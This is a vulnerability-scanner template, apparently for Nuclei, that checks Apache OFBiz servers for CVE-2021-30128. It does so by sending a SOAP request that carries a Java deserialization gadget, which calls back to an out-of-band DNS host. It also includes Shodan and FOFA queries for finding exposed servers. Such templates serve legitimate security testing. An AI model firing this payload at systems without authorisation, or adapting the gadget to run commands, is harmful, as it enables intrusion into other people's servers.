id: CVE-2021-30128

info:
  name: Apache OFBiz <17.12.07 - Arbitrary Code Execution
  author: For3stCo1d
  severity: critical
  description: Apache OFBiz has unsafe deserialization prior to 17.12.07 version
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-30128
    - https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E
  metadata:
    shodan-query: OFBiz.Visitor=
    fofa-query: app="Apache_OFBiz"
  tags: cve,cve2021,apache,ofbiz,deserialization,rce

requests:
  - raw:
      - |
        POST /webtools/control/SOAPService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">  
          <soapenv:Header/>  
            <soapenv:Body>
              <ser>
                <map-Map>
                  <map-Entry>
                    <map-Key>
                      <cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</cus-obj>
                    </map-Key>  
                  <map-Value>  
                <std-String/>
                </map-Value>
                </map-Entry>
              </map-Map>
              </ser>
            </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the HTTP Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "errorMessage"